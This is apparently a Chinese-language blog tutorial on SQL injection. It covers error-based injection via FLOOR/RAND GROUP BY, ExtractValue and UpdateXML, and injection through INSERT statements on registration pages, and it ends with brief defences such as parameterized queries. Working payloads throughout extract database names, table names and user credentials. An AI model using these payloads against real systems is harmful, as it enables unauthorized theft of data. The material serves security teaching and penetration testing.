SQL注入漏洞

开篇:什么是 SQL 注入?

简单来说,SQL 注入就是"把 SQL 命令插到网页里,让数据库听话"。

攻击者通过在输入框(如 URL 参数、表单)中插入恶意的 SQL 代码,欺骗服务器执行非授权的数据库操作,从而窃取、篡改或删除数据。

这次我们重点看两个硬核场景:如何在没有回显的情况下把数据"逼"出来(报错注入) ,以及在新增数据的地方搞事情(Insert 注入)


核心篇一:报错注入------"借刀杀人"的艺术

当网页不会直接显示数据库内容时,高明的黑客会故意制造"错误",让数据库在报错信息里把秘密说出来。

1. Floor 报错注入(Group By 随机数漏洞)

这招的原理有点绕,但很经典。

  • 原理 :利用 GROUP BY 语句和 RAND() 随机数函数的特性。在插入临时表时,如果随机数重复计算,会导致主键冲突,从而报错。

  • 利用姿势

    复制代码
    SELECT COUNT(*), CONCAT((SELECT DATABASE()), FLOOR(RAND(0)*2)) x 
    FROM information_schema.tables 
    GROUP BY x;

    注:RAND(0) 是为了保证随机数序列固定,确保报错必现。

2. XPath 报错注入(ExtractValue & UpdateXML)

这招更直接,利用 XML 函数处理错误格式数据时会报错的特性。

  • ExtractValue() :从 XML 中提取内容。

    复制代码
    id=1 AND ExtractValue(1, CONCAT(0x5c, (SELECT VERSION())))
  • UpdateXML() :更新 XML 内容。

    复制代码
    id=1 AND UpdateXML(1, CONCAT(0x5e, (SELECT USER())), 1)
  • 实战技巧 :这两个函数对返回长度有限制(通常 32 位)。如果数据太长(比如密码哈希),需要用 SUBSTRING() 分段截取。


实战篇二:Insert 注入------注册页也能偷数据

大家通常只关注登录查询(Select)的注入,却忽略了**新增(Insert)**数据的地方(如:留言板、注册页)。

1. 场景还原

假设注册时输入用户名 admin,后台拼接的 SQL 可能是:

复制代码
INSERT INTO users (username) VALUES ('admin');

2. 注入手法

我们输入的 payload:

复制代码
' OR (恶意语句) OR '

拼接后变成:

复制代码
INSERT INTO users (username) VALUES ('' OR (恶意语句) OR '');

由于 '' 是空字符串(False),OR 会让数据库去执行中间的"恶意语句"。

3. 实战步骤(偷数据)

利用上面的 Insert 漏洞,我们可以结合报错注入把数据库里的东西偷出来:

  • 偷库名

    复制代码
    ' OR (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x5e, (SELECT DATABASE()), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) a) OR '
  • 偷表名/字段
    利用 information_schema 系统库,通过修改 table_schematable_name 条件,把表名和字段名一个个"炸"出来。

  • 偷内容
    直接 SELECT 用户表的 usernamepassword


总结与防御

作为攻击者(渗透测试):

  1. 先判断类型:是查询(Select)还是新增(Insert)?
  2. 选好载荷:有回显用联合查询(Union),没回显用报错(报错函数长度限制要分段)。
  3. 善用工具:虽然手工很酷,但 Sqlmap 依然是神器。

作为防御者(开发/运维):

  1. 参数化查询:这是最根本的解决办法,不要拼接 SQL 字符串!
  2. 最小权限原则 :Web 应用连接数据库的账号不要给 FILEDROP 等高危权限。
  3. 错误处理:不要把详细的数据库错误信息直接暴露给前端用户。

相关推荐
jiayou6416 小时前
KingbaseES 表级与列级加密完全指南
数据库·后端
GBASE1 天前
G术时刻 |GBase 8s数据库事务并发控制之封锁技术介绍(下)
数据库
xiezhr2 天前
逛GitHub发现了一款免费的带AI功能的数据库管理工具
数据库·ai编程·dba
唐青枫3 天前
MySQL JSON 实战详解:从存储、查询、更新到 JSON_TABLE 与索引
sql·mysql
吃糖的小孩3 天前
给 QQ AI 机器人设计“可控记忆”:会话摘要、手动长期记忆与角色卡边界
数据库
笃行3504 天前
金仓数据库数据安全双防线:静态存储加密与传输加密实战
数据库
笃行3504 天前
金仓数据库物理备份实战:sys_rman 全流程演练与误覆盖抢救
数据库
笃行3504 天前
金仓数据库逻辑备份实战:从全库导出到 Schema 替换的完整闭环
数据库
SelectDB4 天前
阶跃星辰基于 SelectDB 构建 PB 级 Agent 可观测平台
大数据·数据库·aigc